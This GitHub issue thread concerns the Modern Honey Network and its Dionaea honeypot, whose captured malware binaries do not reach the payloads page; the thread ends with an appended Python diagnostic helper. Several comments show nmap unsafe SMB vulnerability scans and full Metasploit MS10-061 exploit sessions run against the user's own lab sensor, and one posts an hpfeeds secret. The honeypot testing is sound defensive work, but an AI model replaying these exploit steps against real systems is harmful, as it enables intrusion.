pwnlandia / mhn

Modern Honey Network
GNU Lesser General Public License v2.1

Dionaea in MHN Shows No Payloads #417

Open royikle opened 7 years ago

royikle commented 7 years ago

Hi all

I'm testing the Dionaea sensor. MHN is a very nice tool; it's easy to install Dionaea. I use nmap to scan my Dionaea, and I can get events on the MHN Attacks page.

But here is a question: the payloads page with dionaea.capture does not display any log. Reviewing past issues, I think the point is that there is nothing in /var/dionaea/binaries/. How can I create something in the binaries folder?

royikle commented 7 years ago

For now I have tried two methods, but there is nothing in /var/dionaea/binaries/.

  1. Install curl and close UFW. https://github.com/threatstream/mhn/issues/414

  2. nmap --script smb-vuln-ms08-067.nse -p445 {ip} https://github.com/threatstream/mhn/issues/372

    
    Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-05 16:41 CST
    NSE: failed to initialize the script engine:
    /usr/bin/../share/nmap/nse_main.lua:779: 'smb-vuln-ms08-067.nse' did not match a category, filename, or directory
    stack traceback:
    [C]: in function 'error'
    /usr/bin/../share/nmap/nse_main.lua:779: in function 'get_chosen_scripts'
    /usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
    [C]: in ?

    QUITTING!


Is there any way I can fix this?

royikle commented 7 years ago

I used nmap to check port 445; it's open.

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)

Firewall is down.

ubuntu@ubuntu:~$ sudo ufw status
[sudo] password for ubuntu: 
Status: inactive

royikle commented 7 years ago

They are my virtual machines using NAT. I want to solve every problem as far as possible before I put it online. So we talk about location. Does that mean some attacks just have logs but will not catch binaries (like: nmap -sV -P0 IP)? Maybe I need to use another method to check binaries?

Waseem-farooqui commented 7 years ago

Try this and check whether your honeypot is really vulnerable to the SMB vulnerability MS08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}

arnydo commented 7 years ago
I have had the same issue when deployed via the script in MHN. I manually installed Dionaea and then linked it to MHN for monitoring. Started catching binaries right away.

SmUrF3R5 commented 7 years ago

How did you deploy manually and link to mhn?

arnydo commented 7 years ago
I followed the install instructions from: HTTPS://github.com/dinotools/dionaea

And linked it via Hpfeeds as described at: https://github.com/threatstream/mhn/wiki/Incorporate-an-already-deployed-Honeypot-into-MHN

Hope this helps!

SmUrF3R5 commented 7 years ago

Thanks for that. I am unclear as to what to put here. PUBLISH_CHANNELS=

royikle commented 7 years ago

1. Try nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}

  ubuntu@ubuntu:~$ nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse 10.20.1.81
  Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:35 CST
  Unable to split netmask from target expression: "/usr/share/nmap/scripts/smb-check-vulns.nse"
  ubuntu@ubuntu:/usr/share/nmap/scripts$ nmap -A 10.20.1.81
  Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:42 CST
  Nmap scan report for 10.20.1.81
  Host is up (0.0012s latency).
  Not shown: 991 closed ports
  PORT     STATE SERVICE      VERSION
  21/tcp   open  ftp          Dionaea honeypot ftpd
  .
  .
  .
  Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 287.36 seconds

No payloads in MHN and no file in /var/dionaea/binaries/.

2. I deployed Dionaea with the MHN deploy script. I don't know how to link it to MHN, so I just used the script to install. It will link to MHN automatically, I think. Isn't it?

3. About linking to hpfeeds. My problem is bigger than @SmUrF3R5's. I just know IDENT is the UUID from MHN. I have no idea where I can find SECRET and PUBLISH_CHANNELS. Is SECRET in dionaea.conf?

Waseem-farooqui commented 7 years ago

Check the installation directory of nmap and find out the scripts that are related to SMB vulnerabilities. Dionaea gets the payload on 445; the nmap scanner is only for testing your setup. To upload the malware sample you have to use tools like Metasploit.

  1. Yes, the MHN script automatically connects the honeypot to the MHN server.
  2. Yes, the secret is in Dionaea's configuration and also in MongoDB on the server; publish channels are also in MongoDB.

royikle commented 7 years ago

I checked the path /usr/share/nmap/scripts and found a smb-check-vulns.nse file. So the file is there, but the command can't run. Is there any command to do the same thing? I tried this command:

ubuntu@ubuntu:~$ nmap -A --script=smb-check-vulns.nse 10.20.1.81

The /var/dionaea/binaries/ is still empty. My command seems to work. Is smb-check-vulns.nse not Metasploit? I'm not good at Metasploit. I can open the Armitage tool in Kali but don't really understand what every attack means. Can someone recommend a keyword for Metasploit that I can google by myself?

Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 15:15 CST
Nmap scan report for 10.20.1.81
Host is up (0.011s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)
.
.
.
Host script results:
| smb-check-vulns: 
|   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
|   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.94 seconds

Waseem-farooqui commented 7 years ago

Add the argument --script-args=unsafe=1 to your nmap command, like this: nmap -A --script=smb-check-vulns.nse --script-args=unsafe=1 10.20.1.81, because as per the nmap output your system looks clean; that means your configurations are not valid. Try the command and share the output.

royikle commented 7 years ago

OK, I tried the command: nmap -A --script=smb-check-vulns.nse --script-args=unsafe=1 10.20.1.81. The /var/dionaea/binaries/ is empty. Here is the output. It seems I can try the MS08-067 threat?

Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 16:56 CST
Nmap scan report for 10.20.1.81
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :

Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NOT VULNERABLE

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 340.23 seconds

Waseem-farooqui commented 7 years ago

Your configuration looks fine as MS08-067 is vulnerable, so use Metasploit to upload the exploit to your Dionaea using the following.

https://docs.google.com/document/d/1Lg5q-NL38mjbwYHYP4cGrGZ5baY4etB0-BdWPie2xVw/edit?usp=sharing

royikle commented 7 years ago

ubuntu@ubuntu:~$ msfconsole
msfconsole: command not found

So I need to install the Metasploit Framework first, right? I will try it tomorrow!

royikle commented 7 years ago

Sorry for yesterday, I just had something important. First I used the script from the Google Doc.

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.144
LHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options

Module options (exploit/windows/smb/ms10_061_spoolss):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PNAME    XPSPrinter       no        The printer share name to use on the target
   RHOST    192.168.216.144  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  spoolss          no        The named pipe for the spooler service

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse TCP handler on 192.168.216.144:4444 
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[-] 192.168.216.144:445 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.

Maybe it's not a good idea to scan Dionaea from itself. I will create a new VM and try again.

royikle commented 7 years ago

I just used another VM to try this.

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.139
LHOST => 192.168.216.139
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options

Module options (exploit/windows/smb/ms10_061_spoolss):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PNAME    XPSPrinter       no        The printer share name to use on the target
   RHOST    192.168.216.144  yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  spoolss          no        The named pipe for the spooler service

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse TCP handler on 192.168.216.139:4444 
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Attempting to exploit MS10-061 via \\192.168.216.144\XPSPrinter ...
[*] 192.168.216.144:445 - Printer handle: 0000000000000000000000000000000000000000
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 73802 bytes to %SystemRoot%\system32\eb1czUt1c1YZ0v.exe
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 2233 bytes to %SystemRoot%\system32\wbem\mof\mu4JkthYhxiKjN.mof
[-] 192.168.216.144:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.

msf exploit(ms10_061_spoolss) > sqlite3 /var/dionaea/logsql.sqlite
[-] Unknown command: sqlite3.
msf exploit(ms10_061_spoolss) > select * from download;
[-] Unknown command: select.
msf exploit(ms10_061_spoolss) >  ls -l /var/dionaea/binaries/  
[*] exec:  ls -l /var/dionaea/binaries/  

ls: cannot access /var/dionaea/binaries/: No such file or directory

There are two files in /var/dionaea/binaries/: 415454e80e4ebc341928b6f5b89d251d and spoolss-2hhwq5zi.tmp

And Dionaea payloads in MHN are still empty. I installed this Dionaea using the MHN deploy script. Does that mean I have a problem with Dionaea connecting to MHN?

Waseem-farooqui commented 7 years ago

You have to run the sqlite3 command on the sensor, not in Metasploit, and the SQL query in the sqlite3 console. You have to check the hpfeeds section of the Dionaea configuration; is it proper?

royikle commented 7 years ago

ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from download;
Error: no such table: download
ubuntu@ubuntu:~$ ls -l /var/dionaea/binaries/ 
total 152
-rw------- 2 nobody nogroup 73802 Jun  8 15:14 415454e80e4ebc341928b6f5b89d251d
-rw------- 2 nobody nogroup 73802 Jun  8 15:14 spoolss-2hhwq5zi.tmp

I used the script in MHN to find out Dionaea's configuration.

mongo hpfeeds
> db.auth_key.find()

{ "_id" : ObjectId("59350aad1d41c805e59d6091"), "subscribe" : [ ], "secret" : "Qa8EsgaruZZezlVZ", "identifier" : "1919e7aa-49c2-11e7-b60b-000c2940d5f9", "publish" : [ "mwbinary.dionaea.sensorunique", "dionaea.capture", "dionaea.capture.anon", "dionaea.caputres", "dionaea.connections" ] }

And checked the dionaea.conf file on the Dionaea sensor in /etc/dionaea.

        hpfeeds = {
            hp1 = {
                server = "10.20.1.xx"
                port = "10000"
                ident = "1919e7aa-49c2-11e7-b60b-000c2940d5f9"
                secret = "Qa8EsgaruZZezlVZ"
                // dynip_resolve: enable to lookup the sensor ip through a webservice
                dynip_resolve = "http://queryip.net/ip/"
            }
        }

The server is my MHN IP, and ident and secret look OK. I checked the port status. MHN:

PORT      STATE SERVICE           VERSION
80/tcp    open  http              nginx 1.4.6 (Ubuntu)
3000/tcp  open  http-proxy        sslstrip
8181/tcp  open  tcpwrapped
10000/tcp open  snet-sensor-mgmt?

Dionaea:

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Dionaea honeypot ftpd
22/tcp   open  ssh          (protocol 2.0)
42/tcp   open  tcpwrapped
135/tcp  open  msrpc?
445/tcp  open  microsoft-ds Dionaea honeypot smbd
1433/tcp open  ms-sql-s     Dionaea honeypot MS-SQL server
3306/tcp open  mysql        MySQL 5.0.54
5060/tcp open  sip          (SIP end point; Status: 200 OK)
5061/tcp open  ssl/sip      (SIP end point; Status: 200 OK)

Does port 10000 also need to be open on Dionaea?

Waseem-farooqui commented 7 years ago

Use the query select * from downloads. Also test your MHN machine: are all the services running? sudo supervisorctl status, sudo supervisorctl restart all. No, it's the server port; the client port could be anything.

royikle commented 7 years ago

OK, mhn-celery-worker was really FATAL. I tried to start it just now using the MHN Troubleshooting Guide. So I need to do the actions in the Google Doc again, right?

ubuntu@ubuntu:/var/log/mhn$ sudo supervisorctl status
geoloc                           RUNNING    pid 2882, uptime 0:07:53
honeymap                         RUNNING    pid 2898, uptime 0:07:51
hpfeeds-broker                   RUNNING    pid 2867, uptime 0:07:53
mhn-celery-beat                  RUNNING    pid 2866, uptime 0:07:53
mhn-celery-worker                RUNNING    pid 2984, uptime 0:00:16
mhn-collector                    RUNNING    pid 2897, uptime 0:07:51
mhn-uwsgi                        RUNNING    pid 2887, uptime 0:07:52
mnemosyne                        RUNNING    pid 2875, uptime 0:07:53

And very sorry, I don't really know how to query select * from downloads. Is the script like this?

sqlite> query select * from downloads.
   ...> ls -l /var/dionaea/binaries/ 
   ...> 

Waseem-farooqui commented 7 years ago

Why do you want Dionaea, what is your purpose? And don't write query before select, and put ; at the end.

Waseem-farooqui commented 7 years ago

mhn-celery-worker was FATAL before the restart?

royikle commented 7 years ago

Yes, mhn-celery-worker was FATAL before the restart.

I will put Dionaea online; before that I need to know as much as possible about what will happen. And I need to answer my co-workers' every question about MHN, even if it's just a part of a sensor. For this case, I want to know how Dionaea payloads work and what information will be output.

Waseem-farooqui commented 7 years ago

You have payloads on the MHN dashboard now? OK.

royikle commented 7 years ago

No, there is nothing on the payloads page. It's really odd. I will try to reinstall MHN and Dionaea. Maybe there were so many changes to them that something had a bad effect. I had a timestamp problem before and the final solution was that MHN had something broken. I reinstalled MHN and did the same thing, and the problem was fixed (#405). So I hope this time is the same situation.

royikle commented 7 years ago

After reinstall:

  1. MHN port 10000 is open
  2. Supervisorctl status are all RUNNING
  3. Check hpfeed information in both mhn and dionaea are the same.
  4. Run msfconsole.
  5. Run sqlite3. It seems I don't have a table named download.
    ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
    SQLite version 3.8.2 2013-12-06 14:53:30
    Enter ".help" for instructions
    Enter SQL statements terminated with a ";"
    sqlite> select * from download;
    Error: no such table: download
  6. Two files in /var/dionaea/binaries.
  7. Attack page has logs but dionaea.capture in payloads gets nothing.

I have no idea about it. Can someone let me know what the information looks like on the dionaea.capture page? I can't create it by myself, so I want to know at least what will be there. Or does someone still have a solution to teach me?

Waseem-farooqui commented 7 years ago

First of all, the table is downloads, not download. Try to upload the malware samples again from Metasploit; every service should be running. The download page of MHN just shows the hashes.

royikle commented 7 years ago

  1. Check service
    ubuntu@ubuntu:~$ sudo supervisorctl status
    [sudo] password for ubuntu: 
    geoloc                           RUNNING    pid 1494, uptime 3:22:18
    honeymap                         RUNNING    pid 1506, uptime 3:22:18
    hpfeeds-broker                   RUNNING    pid 1492, uptime 3:22:18
    mhn-celery-beat                  RUNNING    pid 1491, uptime 3:22:18
    mhn-celery-worker                RUNNING    pid 1498, uptime 3:22:18
    mhn-collector                    RUNNING    pid 1499, uptime 3:22:18
    mhn-uwsgi                        RUNNING    pid 1495, uptime 3:22:18
    mnemosyne                        RUNNING    pid 1493, uptime 3:22:18
  2. Upload the malware samples again from metasploit.
    
    msf exploit(ms10_061_spoolss) > exploit

    [*] Started reverse TCP handler on 192.168.216.139:4444
    [*] 10.20.1.xx:445 - Trying target Windows Universal...
    [*] 10.20.1.xx:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ...
    [*] 10.20.1.xx:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ...
    [*] 10.20.1.xx:445 - Attempting to exploit MS10-061 via \\10.20.1.xx\XPSPrinter ...
    [*] 10.20.1.xx:445 - Printer handle: 0000000000000000000000000000000000000000
    [*] 10.20.1.xx:445 - Job started: 0x3
    [*] 10.20.1.xx:445 - Wrote 73802 bytes to %SystemRoot%\system32\25sOBX2ew81reE.exe
    [*] 10.20.1.xx:445 - Job started: 0x3
    [*] 10.20.1.xx:445 - Wrote 2241 bytes to %SystemRoot%\system32\wbem\mof\Pd0IItuyiKmnp6.mof
    [-] 10.20.1.xx:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
    [*] Exploit completed, but no session was created.

3. File in /var/dionaea/binaries/

4. Use SQLite.
    The script here always confuses me.
    I think my script here may be incorrect again?
    I just show them but get nothing.

    ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
    SQLite version 3.8.2 2013-12-06 14:53:30
    Enter ".help" for instructions
    Enter SQL statements terminated with a ";"
    sqlite> select * from downloads;
    1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
    2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4
    sqlite> ls -l /var/dionaea/binaries/
       ...>

5. Attack page has logs but dionaea.capture in payloads gets nothing.

Waseem-farooqui commented 7 years ago

Brother, in sqlite you just have to run the SQL queries; ls -l /var/dionaea/binaries/ is a Linux command.

royikle commented 7 years ago

Sorry bro, I'm really not good at SQL. Can you teach me how to do SQL queries? I just got here and I don't know what's next.

ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from downloads;
1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4

royikle commented 7 years ago

I have sent the mail. Really, thanks for your help.

JBAnderson commented 7 years ago

Did you ever get the uploads showing on the payloads page? How did you resolve the issue? I have a Dionaea instance that is catching malware, my hpfeed is sending data to MHN, but there is nothing showing up in payloads. Thanks!

royikle commented 7 years ago

I could see files in /var/dionaea/binaries/, the connection between MHN and Dionaea is no problem, and all services are running. But after I upload with Metasploit, the payloads page shows nothing. Is your situation like mine?

JBAnderson commented 7 years ago

I did actually get it working. I updated curl to version 7.50 and installed MHN as root. Everything is working great now.

JBAnderson commented 6 years ago

I wrote up what I did in a blog post found here: https://www.attacusatlas.com/how-to-set-up-dionaea-honeypot-with-modern-honey-network-and-slack-alerts/

Hope it helps!

royikle commented 6 years ago

Thanks!! I will check the blog and try again.

You installed MHN using sudo as root; this is what I did. So maybe the difference is the curl version; I will check it.

izotope115 commented 6 years ago

I just wanted to say that the article @JBAnderson wrote is excellent. I already had an MHN install working, along with one sensor that was reporting attacks. All with Splunk integration too. But wasn't capturing malware binaries like most users.

After reading @JBAnderson's article I now have a sensor running and capturing malware. It took about 30 mins before I captured the wanna_cry ransomware. Kudos @JBAnderson for the hard work!

royikle commented 6 years ago

So everyone can use the MHN payloads page to show malware information now, except me. I also followed @JBAnderson's blog parts 1 and 2 and used ms10_061_spoolss to test. Nothing changed. I can get attack logs in my MHN but payloads still show nothing. The binaries folder has the spoolss file and all services are up.

Should I try to install Splunk or ELK? Is it related to the MHN payloads page?

JBAnderson commented 6 years ago

@royikle ELK and Splunk are unrelated to your issue.

The most likely place to look I think is where you set up the HPFeeds user. The publish channels need to be exactly:

"dionaea.connections,dionaea.capture,mwbinary.dionaea.sensorunique,dionaea.caputres,dionaea.capture.anon"

(even though it looks like there's a typo in one of them)

It sounds like you are getting the "dionaea.connections" messages but not the others.

Lemme know!

royikle commented 6 years ago

Thanks for your answer @JBAnderson. I checked my MHN hpfeeds. It seems good. Does the VirtualBox network being set to bridged affect it?

> db.auth_key.find({identifier: "7c5709e2-769f-11e7-a4de-08002786e5ea"})
{ "_id" : ObjectId("59804ff531eddd0543c86aa5"), "subscribe" : [ ], "secret" : "FFffF*************", "identifier" : "7c5709e2-769f-11e7-a4de-***********", "publish" : [ "dionaea.connections", "dionaea.capture", "mwbinary.dionaea.sensorunique", "dionaea.caputres", "dionaea.capture.anon" ] }

suwitcham commented 6 years ago

I had MHN with Dionaea running for a week before I started to see payload captures. Not sure if the nmap script or Metasploit really sends a malicious file to 445 (SMB). If they just exploit and send the payload to memory, I don't think Dionaea can capture it.

royikle commented 6 years ago

Nmap has no payloads; it just scans Dionaea. But using ms10_061_spoolss to exploit Dionaea, we can check the payload file in the binaries folder. If they just sent the payload to memory, the file would disappear after restarting the VM. So I think spoolss should be captured, but the problem is why I can't show the message in MHN.

suwitcham commented 6 years ago

@JBAnderson, great advice on the Dionaea setup. I added another sensor from your instructions and now I got a Wannacry sample :D

royikle commented 6 years ago

@suwitcham, is the sample shown on the MHN payloads page? Or in the Dionaea binaries folder? If you can show it on MHN, I am the only one who can't show it on payloads.

suwitcham commented 6 years ago

It shows on both the MHN payloads page for Dionaea and under the binaries folder of Dionaea itself.

royikle commented 6 years ago

Everybody follows @JBAnderson's article and only I can't show it. It seems the MHN & Dionaea settings are good. Does that mean maybe the problem is the VM setting or firewall? But it just sends a log to MHN; is it possible for that to be blocked?

suwitcham commented 6 years ago

Let's take it as two separate issues. Dionaea itself also works standalone. If you can see anything in the Dionaea log, it should be something wrong by itself.

royikle commented 6 years ago

I can see the malicious file (spoolss) in the binaries folder. And I can see attack logs in Dionaea. So I think Dionaea is working.

JBAnderson commented 6 years ago

@royikle try the following from the troubleshooting wiki:

Out of the box, mnemosyne filters out attacks coming from RFC1918 addresses, so you need to configure it not to do so. Here are the steps:

As root, run these commands.

    cd /opt/mnemosyne/
    git fetch origin
    git stash
    git merge origin/master
    git stash pop

Now, edit mnemosyne.cfg and append this to the end of the file.

    [normalizer]
    ignore_rfc1918 = False

Lastly, run this command:

    supervisorctl restart mnemosyne

Then run.

    supervisorctl status

You should see something like this:

    geoloc                           RUNNING    pid 16719, uptime 1:25:31
    honeymap                         RUNNING    pid 17223, uptime 0:30:29
    hpfeeds-broker                   RUNNING    pid 980, uptime 10 days, 5:19:51
    mhn-celery-beat                  RUNNING    pid 961, uptime 10 days, 5:19:51
    mhn-celery-worker                RUNNING    pid 14878, uptime 3:44:43
    mhn-uwsgi                        RUNNING    pid 9580, uptime 9 days, 3:46:32
    mnemosyne                        RUNNING    pid 17749, uptime 0:05:26
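The two sensor-side checks this thread ends up needing, as an added Python example (not code from MHN, mnemosyne or Dionaea): whether an MHN hpfeeds auth_key entry carries all five publish channels @JBAnderson listed, and whether mnemosyne's default RFC1918 filter would drop downloads whose source is a private address, as with the 10.20.1.87 rows in the sqlite3 output above. The extra public-address row and the mnemosyne.cfg fragments are constructed; the downloads column order (download, connection, download_url, download_md5_hash) is assumed from the sqlite3 output in the thread.

```python
import configparser
import ipaddress

# Publish channels the MHN hpfeeds user for a Dionaea sensor needs, as quoted
# in the thread. "dionaea.caputres" is misspelled on purpose: that is the
# channel name MHN expects.
REQUIRED_PUBLISH_CHANNELS = {
    "dionaea.connections",
    "dionaea.capture",
    "mwbinary.dionaea.sensorunique",
    "dionaea.caputres",
    "dionaea.capture.anon",
}

# The three RFC1918 ranges that mnemosyne's normalizer drops by default.
RFC1918_NETWORKS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# Sample input: the two rows from the thread's sqlite3 output plus one
# constructed row with a public (documentation-range) source for contrast.
SAMPLE_DOWNLOADS = """\
1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4
3|3|http://203.0.113.9/x.exe|d41d8cd98f00b204e9800998ecf8427e
"""

# Constructed mnemosyne.cfg fragments: an untouched file (no [normalizer]
# section, so the default applies) and one with the fix from the thread.
MNEMOSYNE_CFG_DEFAULT = "# constructed: no [normalizer] section present\n"
MNEMOSYNE_CFG_FIXED = "[normalizer]\nignore_rfc1918 = False\n"


def missing_publish_channels(publish):
    """Return the required channels absent from an auth_key 'publish' list."""
    return sorted(REQUIRED_PUBLISH_CHANNELS - set(publish))


def mnemosyne_ignores_rfc1918(cfg_text):
    """Read [normalizer] ignore_rfc1918 from mnemosyne.cfg text; True when unset."""
    cfg = configparser.ConfigParser()
    cfg.read_string(cfg_text)
    return cfg.getboolean("normalizer", "ignore_rfc1918", fallback=True)


def source_ip_from_download_url(url):
    """Return the attacker address embedded in a dionaea download URL such as
    'spoolss://::ffff:10.20.1.87'; IPv4-mapped IPv6 is unwrapped to IPv4."""
    host = url.split("://", 1)[1].split("/", 1)[0]
    addr = ipaddress.ip_address(host)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return str(addr)


def is_rfc1918(ip_text):
    """True when the address is in 10/8, 172.16/12 or 192.168/16."""
    addr = ipaddress.ip_address(ip_text)
    return isinstance(addr, ipaddress.IPv4Address) and any(
        addr in net for net in RFC1918_NETWORKS
    )


def parse_downloads_rows(text):
    """Parse the pipe-separated rows sqlite3 prints for 'select * from downloads;'
    (assumed columns: download id, connection id, download_url, download_md5_hash)."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split("|")
        # Skip anything that is not a row, e.g. a shell command typed at the prompt.
        if len(parts) != 4 or not parts[0].isdigit():
            continue
        rows.append({"download": int(parts[0]), "connection": int(parts[1]),
                     "url": parts[2], "md5": parts[3]})
    return rows


def downloads_dropped_by_mnemosyne(rows, cfg_text):
    """md5s of downloads whose source is RFC1918 and would therefore be
    filtered by mnemosyne's normalizer under the given configuration."""
    if not mnemosyne_ignores_rfc1918(cfg_text):
        return []
    return [r["md5"] for r in rows if is_rfc1918(source_ip_from_download_url(r["url"]))]


if __name__ == "__main__":
    rows = parse_downloads_rows(SAMPLE_DOWNLOADS)
    for name, cfg in (("default", MNEMOSYNE_CFG_DEFAULT), ("fixed", MNEMOSYNE_CFG_FIXED)):
        dropped = downloads_dropped_by_mnemosyne(rows, cfg)
        print(f"{name}: {len(dropped)} of {len(rows)} downloads filtered: {dropped}")
    print("missing channels:", missing_publish_channels(["dionaea.connections"]))
```

With the default configuration both spoolss captures from 10.20.1.87 are filtered, which is consistent with the thread's symptom of attack logs arriving while the payloads page stays empty during lab testing from a NAT or bridged VM.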